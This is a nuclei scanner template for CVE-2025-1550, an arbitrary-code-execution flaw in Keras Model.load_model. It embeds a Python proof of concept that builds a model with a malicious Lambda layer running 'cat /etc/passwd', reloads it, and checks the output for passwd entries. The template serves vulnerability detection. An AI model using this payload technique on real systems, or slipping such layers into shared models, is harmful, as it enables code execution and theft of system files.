mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
80 lines
2.7 KiB
YAML
80 lines
2.7 KiB
YAML
id: CVE-2025-1550
|
|
|
|
info:
|
|
name: Keras Model.load_model - Arbitrary Code Execution
|
|
author: nukunga[seunghyeonJeon]
|
|
severity: critical
|
|
description: |
|
|
The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading
|
|
impact: |
|
|
Attackers can execute arbitrary code during model loading, potentially leading to remote code execution or system compromise.
|
|
remediation: |
|
|
Update to the latest version of Keras where this issue is fixed or apply security patches provided by the developers.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-1550
|
|
- https://github.com/keras-team/keras/pull/20751
|
|
- https://towerofhanoi.it/writeups/cve-2025-1550/
|
|
classification:
|
|
epss-score: 0.04785
|
|
epss-percentile: 0.89156
|
|
metadata:
|
|
max-request: 1
|
|
tags: cve,cve2025,code,keras,rce,ml
|
|
|
|
self-contained: true
|
|
|
|
code:
|
|
- engine:
|
|
- py
|
|
- python3
|
|
|
|
source: |
|
|
import os
|
|
import sys
|
|
|
|
try:
|
|
import tensorflow as tf
|
|
from tensorflow.keras.models import load_model
|
|
from tensorflow.keras.layers import Lambda, Input
|
|
from tensorflow.keras.models import Model
|
|
import numpy as np
|
|
except ImportError:
|
|
sys.exit(1)
|
|
|
|
def create_malicious_model():
|
|
def malicious_function(x):
|
|
result = os.popen("cat /etc/passwd").read()
|
|
print(result)
|
|
return x
|
|
|
|
input_layer = Input(shape=(1,))
|
|
lambda_layer = Lambda(malicious_function, name="evil_lambda")(input_layer)
|
|
model = Model(inputs=input_layer, outputs=lambda_layer)
|
|
return model
|
|
|
|
def exploit_lambda_layer():
|
|
model_path = "/tmp/malicious_model.keras"
|
|
try:
|
|
model = create_malicious_model()
|
|
model.save(model_path)
|
|
del model
|
|
|
|
loaded_model = load_model(model_path)
|
|
test_input = np.array([[1.0]])
|
|
loaded_model.predict(test_input, verbose=0)
|
|
|
|
return True
|
|
except:
|
|
return False
|
|
finally:
|
|
if os.path.exists(model_path):
|
|
os.remove(model_path)
|
|
|
|
exploit_lambda_layer()
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: response
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a0047304502200b3639bf4133444d02527e51a65422d49bfd3c8d83548e80319a56140b5d6a58022100b8c0b3f283adaa6bf284c2f7053351f15a3d06383859401caff96390f8bddea2:922c64590222798bb761d5b6d8e72950 |